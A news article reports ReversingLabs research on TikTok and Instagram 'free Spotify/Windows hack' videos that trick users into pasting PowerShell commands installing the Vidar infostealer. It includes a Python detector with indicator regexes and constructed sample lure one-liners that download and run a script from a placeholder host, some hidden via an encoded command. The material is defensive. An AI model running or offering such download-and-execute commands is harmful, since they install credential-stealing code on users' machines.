
Forget phishing emails – cybercriminals are now using viral “hack” tutorials posted on TikTok and Instagram to trick users into downloading malware that can steal your passwords, personal information, and even crypto wallets, new research warns.
- Hackers are using fake videos on platforms like TikTok and Instagram to trick users into downloading password-stealing malware.
- Researchers say short-form videos promoting “free Spotify Premium” hacks and Windows tips are replacing traditional phishing email attacks.
- The campaign highlights how infostealer malware continues fueling account takeovers, fraud, and wider cybercrime operations.
Viral TikTok “hacks” spread malware
The savvy hackers are luring users with short-form videos that promise free software activation and upgrades to popular platforms, including Spotify Premium, Windows, Microsoft Office products such as Word, and Adobe Premiere, according to a new blog by ReversingLabs.
“Primarily conducted on TikTok and Instagram Reels, these campaigns use the same template to mass-produce videos and make regular posts,” said Zaria Vuksan, threat intel researcher at ReversingLabs.
Researchers say they uncovered two distinct content-fueled phishing campaigns that use short-form “tutorial hack” videos across multiple social media platforms – all of them leading to a secondary website hosting the “free software.”
“Either approach is a means to a different end, and the differences demonstrate how attackers can leverage different aspects of social media engagement to reach more potential victims,” Vuksan said.
Password-stealing malware hides in fake downloads
The first method is fairly straightforward. The attackers create polished-looking videos, complete with professional-sounding voice-overs and clean graphics, and repeatedly post them on platforms using multiple accounts.
For the Microsoft-themed scams, researchers found the nefarious accounts using official Windows logos and profile handles such as “windows.tips” or “window.insight” to build credibility.
Many of the accounts and videos also included descriptions and keyword hashtags to make them appear to resemble authentic customer-support pages.
One of the fraudulent videos ReversingLabs identified had racked up more than 100,000 views and thousands of interactions, making it more “algorithmically valuable” and likely to show up on user feeds.
Once hooked, victims are instructed to copy and paste a specific command into Windows PowerShell, claiming it will activate the premium features.
“The video is short and to the point, showing users step-by-step how to access PowerShell from the Windows menu and what command to input to supposedly unlock this free service,” the blog states.
Vuksan says non-technical users often do not know any better and may assume the command-line instructions are legitimate. “Attackers are relying on this lack of understanding,” she adds.
Next, the PowerShell command triggers the payload, downloading the powerful Vidar infostealer directly onto the victim’s device.
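The lure described above works because the pasted one-liner does all the fetching and executing in a single step. The following is an added example, not code from ReversingLabs or Malwarebytes, showing how a defender can triage PowerShell command text as it appears in script block logging (Event ID 4104), a terminal history, or a clipboard monitor: it scores download-and-execute indicators and also decodes any `-EncodedCommand` payload so the hidden script is scanned too. The indicator weights, the threshold, and all sample lines are constructed for illustration; `example.invalid` is a placeholder, not infrastructure from the campaign.

```python
"""Flag PowerShell one-liners that look like copy-and-paste malware lures.

Added example for this article, not code from ReversingLabs or Malwarebytes.
Indicator weights, the threshold and every sample line are constructed for
illustration; example.invalid is a placeholder domain.
"""
import base64
import re

# (indicator name, pattern, weight). Weights are a tuning choice, not a standard.
INDICATORS = [
    ("web_download",
     re.compile(r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|curl|wget|"
                r"DownloadString|DownloadFile|Net\.WebClient)\b", re.I), 2),
    ("invoke_expression", re.compile(r"\b(Invoke-Expression|iex)\b", re.I), 3),
    ("encoded_command", re.compile(r"-(enc|encodedcommand|ec|e)\b", re.I), 3),
    ("policy_bypass", re.compile(r"-(ExecutionPolicy|ep)\s+bypass", re.I), 2),
    ("hidden_window", re.compile(r"-(WindowStyle|w)\s+hidden", re.I), 2),
    ("defender_tamper",
     re.compile(r"Set-MpPreference|Add-MpPreference|DisableRealtimeMonitoring", re.I), 3),
]

# -EncodedCommand takes base64 of a UTF-16LE string; the real script hides there.
ENC_RE = re.compile(r"-(?:enc|encodedcommand|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(command):
    """Return the decoded -EncodedCommand script, or None if there is none."""
    m = ENC_RE.search(command)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(command, threshold=4):
    """Score one command line; an encoded payload is decoded and scanned as well."""
    decoded = decode_encoded_command(command)
    haystack = command if decoded is None else command + "\n" + decoded
    hits = [name for name, rx, _ in INDICATORS if rx.search(haystack)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return {"score": score, "indicators": hits, "decoded": decoded,
            "suspicious": score >= threshold}


def encode_for_powershell(script):
    """Encode a script the way -EncodedCommand expects (used only to build a sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample lines: one routine admin command and two lure-style one-liners.
SAMPLE_LINES = [
    "Get-ChildItem -Path C:\\Users -Recurse | Measure-Object",
    "powershell -w hidden -ep bypass -c \"iex (iwr 'https://example.invalid/activate.ps1')\"",
    "powershell -nop -enc " + encode_for_powershell(
        "iex (New-Object Net.WebClient).DownloadString('https://example.invalid/x')"),
]


def flagged(lines):
    """Return the lines that trip the threshold, paired with their indicator names."""
    results = [(line, analyze(line)) for line in lines]
    return [(line, r["indicators"]) for line, r in results if r["suspicious"]]


if __name__ == "__main__":
    for line, names in flagged(SAMPLE_LINES):
        print(f"SUSPICIOUS {names}: {line[:70]}")
```

A single web download cmdlet scores below the threshold, since administrators use those legitimately; it is the combination with an invocation primitive, a hidden window, an execution policy bypass, or an encoded payload that pushes a line over. Treat the hits as triage hints to feed into alerting on 4104 events, not as a verdict.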
Engagement bait turns curiosity into clicks
The second phishing lure uses engagement bait, often showing someone scrolling through premium software features they claim to have unlocked for free.
For example, the videos often look like ordinary user posts, set to trending music, while falsely claiming users can get Spotify Premium for free. They also often span multiple videos.
The goal is to spark comments from curious viewers asking how they did it – giving attackers a chance to reply with instructions, links, or follow-up videos that point to malicious sites.
Vuksan says the strategy helps boost engagement and build trust with followers before directing them to carry out the malicious instructions.
The hook is introduced only after the profile starts to gain traction on TikTok or Instagram.
The researchers, whose reports of the content to the platforms were rejected, also note that social media videos can be difficult to defend against.
“Users who catch onto the malicious intent, either through research or falling for it themselves, may try to warn others in the comments. However, most platforms allow creators to delete comments and block commenters,” they said.
How to avoid fake “free software” scams
Malwarebytes, which wrote its own blog on the ReversingLabs research, says the potent Vidar infostealer silently exfiltrates sensitive data from infected devices, including:
- Browser data – Saved passwords, cookies, autofill information, and some two-factor authentication data.
- System info – Information about the infected device and installed software.
- Login credentials – Usernames and passwords for other installed applications and services.
- Crypto wallets – Private keys and wallet data for various cryptocurrencies.
The Vidar malware, first seen in 2018, is designed to steal information and then send it back to servers controlled by the attackers.
Malwarebytes says that to avoid PowerShell hacks, users should never run commands in PowerShell or Terminal from untrusted sources.
The researchers also recommend being skeptical of social media “tips” in general, since even verified-looking handles can distribute malware, and always using official channels, such as apps and websites, when subscribing to streaming services or downloading software.
Finally, they urge users to always use “real-time, up-to-date anti-malware programs” to block malware and infostealers before they run.